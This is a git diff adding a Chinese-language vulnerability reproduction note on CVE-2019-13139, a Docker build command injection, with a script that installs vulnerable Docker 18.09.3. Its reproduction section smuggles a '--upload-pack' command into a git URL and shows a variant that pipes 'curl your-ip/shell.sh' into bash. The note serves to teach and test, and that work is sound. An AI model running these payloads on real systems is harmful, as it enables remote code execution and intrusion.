diff --git a/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md b/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md new file mode 100644 index 0000000..3d8e866 --- /dev/null +++ b/云安全漏洞/Docker build 漏洞导致命令执行 CVE-2019-13139.md @@ -0,0 +1,94 @@ +# Docker build 漏洞导致命令执行 CVE-2019-13139 + +## 漏洞描述 + +使用 `docker build` 命令构建本地镜像时,支持使用远程 url 参数作为构建环境,并且这个远程构建环境可以是一个 git 仓库。 + +在 Docker 18.9.4 之前版本中,`docker build` 过程中对 `remoteUrl` 解析存在缺陷,导致了 `remoteUrl` 中的部分字符串会被作为命令执行。 + +参考链接: + + - https://nvd.nist.gov/vuln/detail/CVE-2019-13139 + - https://staaldraad.github.io/post/2019-07-16-cve-2019-13139-docker-build/ + - https://github.com/Metarget/metarget + +## 漏洞影响 + +``` +Docker < 18.9.4 +``` + +## 环境搭建 + +ubuntu 18.04 使用以下脚本 `install_docker_18.09.03.sh` 安装 Docker 18.9.3: + +``` +#!/bin/bash +set -e +echo "[*] Removing old Docker versions (if any)..." +sudo apt remove -y docker docker-engine docker.io containerd runc || true + +echo "[*] Removing incorrect Docker sources..." +sudo rm -f /etc/apt/sources.list.d/docker.list || true +sudo sed -i '/download.docker.com/d' /etc/apt/sources.list + +echo "[*] Adding Tsinghua University Docker mirror GPG key..." +wget -qO - https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu/gpg | sudo apt-key add - + +echo "[*] Adding Tsinghua University Docker mirror repository..." +echo "deb [arch=amd64] https://mirrors.tuna.tsinghua.edu.cn/docker-ce/linux/ubuntu bionic stable" \ + | sudo tee /etc/apt/sources.list.d/docker.list + +echo "[*] Updating package index..." +sudo apt update + +echo "[*] Searching for Docker 18.09.3..." +VERSION_STRING=$(apt-cache madison docker-ce | grep 18.09.3 | head -n1 | awk '{print $3}') +if [ -z "$VERSION_STRING" ]; then + echo "[*] Docker 18.09.3 not found" + exit 1 +fi +echo "[*] Found version: $VERSION_STRING" + +echo "[*] Installing Docker version $VERSION_STRING ..." +sudo apt install -y docker-ce=$VERSION_STRING docker-ce-cli=$VERSION_STRING containerd.io + +echo "[*] Locking version to prevent automatic updates..." +sudo apt-mark hold docker-ce docker-ce-cli containerd.io + +echo "[*] Installation complete, current version:" +docker --version +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090739097.png) + +## 漏洞复现 + +执行相关利用命令,执行结果报错但不影响: + +``` +docker build "git@g.com/a/b#--upload-pack=touch 13139.txt;:" +``` + +查看命令是否执行成功: + +``` +ls | grep 13139 +------ +13139.txt +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421090836057.png) + +下载远程 shell 文件并执行: + +``` +# port must be 80 +docker build "git@github.com/a/b#--upload-pack=curl -s your-ip/shell.sh|bash;#:" +``` + +![](images/Docker%20build%20漏洞导致命令执行%20CVE-2019-13139/image-20250421092642068.png) + +## 漏洞修复 + +- 升级至最新版本 https://docs.docker.com/engine/release-notes/ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png new file mode 100644 index 0000000..335f965 Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090739097.png differ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png new file mode 100644 index 0000000..2ab7f14 Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421090836057.png differ diff --git a/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png new file mode 100644 index 0000000..5a71c2e Binary files /dev/null and b/云安全漏洞/images/Docker build 漏洞导致命令执行 CVE-2019-13139/image-20250421092642068.png differ